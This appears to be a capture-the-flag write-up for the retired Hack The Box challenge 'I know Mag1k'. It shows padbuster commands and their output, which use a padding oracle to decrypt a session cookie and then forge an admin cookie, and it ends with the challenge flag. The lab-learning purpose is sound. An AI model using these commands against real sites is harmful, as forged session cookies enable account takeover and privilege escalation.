2 minutes
I know Mag1k
Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.
Challenge info ¶
I know Mag1k [by rkmylo]
Can you get to the profile page of the admin?
The challenge ¶
The website allows us to register an account and to login with our account. Of course the objective is to eventually login into the admin account.

When we login with our newly created account, we go through the following steps:
- POST credentials (username and password) to /login.php
We already have a PHPSESSID cookie. - Be redirected to profile.php
Notice we receive an additional iknowmag1k cookie. - GET /profile.php
The iknowmag1k cookie definitely looks interesting. It looks like a URL-encoded string. URL-decoding it results in what looks to be a Base64 encoded string. Decoding this, however, does not return any legible output, so we are probably dealing with some form of encryption.
I had to peak at the forums to find out how I’m exactly supposed to tackle this challenge. It appears we are dealing with a Padding Oracle Attack.
So we use padbuster to try to decrypt the iknowmag1k cookie, which will most probably contain something usefull. We pass the script a URL to test against, our PHPSESSID cookie (since this may potentially be used in the encryption scheme), as well as our current iknowmag1k cookie. We then define the value of this last cookie as the value that had to be attacked.
$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D"
-------------------------------------------------------
** Finished ***
[+] Decrypted value (ASCII): {"user":"b8498756","role":"user"}
[+] Decrypted value (HEX): 7B2275736572223A226238343938373536222C22726F6C65223A2275736572227D0F0F0F0F0F0F0F0F0F0F0F0F0F0F0F
[+] Decrypted value (Base64): eyJ1c2VyIjoiYjg0OTg3NTYiLCJyb2xlIjoidXNlciJ9Dw8PDw8PDw8PDw8PDw8P
-------------------------------------------------------
It looks like this cookie holds the username and role of the logged in user. So we modify this to hold admin
for both the username and the role. We then run this through padbuster again so it can encode a new valid cookie for us.
$ padbuster http://docker.hackthebox.eu:32982/profile.php "ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" 8 -cookies "PHPSESSID=u43bpp75h91998f7d1icamg0l5; iknowmag1k=ORmcvRBv1sH48kEni%2F3T2dx%2FZn%2FJfpdotyLGxho%2Bwr6C5EUOptiFUAyWq7RApNa18t0hg3Rjtd0%3D" -plaintext '{"user":"admin","role":"admin"}'
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: LDRCU61StZbYrdIXPROTGIprI45i7IsYMAovrw2IGp8AAAAAAAAAAA%3D%3D
-------------------------------------------------------
We then reload the profile.php page, but modify the cookie value.
The flag ¶
We are now greeted with the admin’s profile page, containing our flag 🙂
HTB{Padd1NG_Or4cl3z_AR3_WaY_T0o_6en3r0ys_ArenT_tHey???}